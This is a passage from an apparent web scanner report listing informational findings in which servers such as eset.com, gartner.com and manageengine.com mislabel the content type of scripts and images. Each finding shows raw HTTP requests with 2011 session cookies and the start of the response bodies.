GET /us/scripts/elqNow/elqCfg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965312
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 3070

//------------------------------------------------------
// Copyright Eloqua Corporation.
//
var elqSiteID = '2208';
var elqVer = 'v200';
//
var elqERoot = 'now.eloqua.com/';
var elqSecERoot =
...[SNIP]...

33.63. http://www.eset.com/us/scripts/elqNow/elqImg.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/elqNow/elqImg.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/elqNow/elqImg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965309
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 894

// Copyright Eloqua Corporation.
var elqWDt = new Date(20020101);
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
var elqTzo = elqWDt.getTimezoneOffset();
var elqRef2 = '';
if (type
...[SNIP]...

33.64. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/lib/autocompleter/Autocompleter.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/autocompleter/Autocompleter.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965305
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10881

var Observer=new Class({Implements:[Options,Events],options:{periodical:false,delay:1000},initialize:function(c,a,b){this.element=$(c)||$$(c);this.addEvent("onFired",a);this.setOptions(b);this.bound=t
...[SNIP]...

33.65. http://www.eset.com/us/scripts/lib/jq-promo-lib.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/lib/jq-promo-lib.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq-promo-lib.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978029
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 154

var j = jQuery.noConflict();

j(document).ready(function(){
   j('.promoRadio').click(function(){
       j('.promocode').val(j(this).attr('alt'));
   });
});

33.66. http://www.eset.com/us/scripts/lib/jq.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/lib/jq.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978027
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 78768

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

33.67. http://www.eset.com/us/scripts/lib/mbox.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/lib/mbox.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mbox.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977886
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 20200

var mboxCopyright = "© 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...

33.68. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/lib/mootools-1.2.3-core-yc.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mootools-1.2.3-core-yc.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:45 GMT
X-Varnish: 1310965283
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 66610

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.3",build:"4980
...[SNIP]...

33.69. http://www.eset.com/us/scripts/lib/s_code3.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/lib/s_code3.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/s_code3.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965306
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 80333

/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

33.70. http://www.eset.com/us/scripts/store.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/store.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/store.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978028
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10967

var ESET_Store = {
selected: [],
renew_prices: {},
eav_radio_checked: false,
ess_radio_checked: false,

init: function() {
this.setTabEvents();
this.setRenewQuantity();
...[SNIP]...

33.71. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:54:56 GMT
Content-Length: 5335

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.08469181740656495<&>0ctl01$Banner$User
...[SNIP]...

33.72. http://www.gartner.com/include/webtrends.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gartner.com
Path:	/include/webtrends.jsp

Issue detail

The response contains the following Content-type statement:

Content-type: text/html; charset=ISO8859_1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

33.73. http://www.gartner.com/technology/include/metricsHelper.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gartner.com
Path:	/technology/include/metricsHelper.jsp

Issue detail

The response contains the following Content-type statement:

Content-type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /technology/include/metricsHelper.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Content-length: 277
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:15 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.U8B62F8FE].[OT/html.OG/pages]
Vary: Accept-Encoding

var metricsUserClass = "Visitor";
var metricsLoginTxt = "";
var metricsEmailTxt = "";
var metricsCity = "";
var metricsStateCode =
...[SNIP]...

33.74. http://www.iveco-ptc.spb.ru/images/menu/4d95d099884d7.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.iveco-ptc.spb.ru
Path:	/images/menu/4d95d099884d7.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/menu/4d95d099884d7.gif HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
Referer: http://www.iveco-ptc.spb.ru/?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00fce441a740fea86b906e1e933c9d1b

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/gif
Connection: keep-alive
Last-Modified: Fri, 01 Apr 2011 13:18:17 GMT
ETag: "205e85-3ab6-49fdb3e329840"
Accept-Ranges: bytes
Content-Length: 15030

.PNG
.
...IHDR...c...V.....T..... .IDATx.t.y.&.U.x..".[s......z.Z.jI ...6K..&!. @.....li0.p.c...3....6.3#d0.6.9.XFR.....VC.KUuUuUf..e~kD.w..?^|......>Y.._D.w........?}.........C..$C.P..............2
...[SNIP]...

33.75. http://www.livejournal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.livejournal.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260; ljuniq=yNcQcrN8FpUfQop:1303741249:pgstats0:m0

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:48:47 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
X-AWS-Id: ws13
Last-Modified: Mon, 15 Dec 2008 21:35:16 GMT
ETag: "4b0e4f-1466-45e1c9e5f8d00"
Content-Length: 5222
X-Varnish: 1971688293 1956434700
Age: 97599
Via: 1.1 varnish

..............(...F...........h...n... .............. ..............(....... ......................................................................................................D.....DDD....D.sD..
...[SNIP]...

33.76. http://www.livejournal.com/tools/endpoints/journalspotlight.bml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.livejournal.com
Path:	/tools/endpoints/journalspotlight.bml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

Response

33.77. http://www.manageengine.com/images/bandwidth-monitoring.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manageengine.com
Path:	/images/bandwidth-monitoring.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/bandwidth-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "aad2-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 43730
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...g...K........o....PLTE...x.x.....;.........}.}..w........................jik...l..........]........H......r.......................i..........j.............ef.....i......i.........vW
...[SNIP]...

33.78. http://www.manageengine.com/images/ip-sla-voip-monitoring.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manageengine.com
Path:	/images/ip-sla-voip-monitoring.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/ip-sla-voip-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
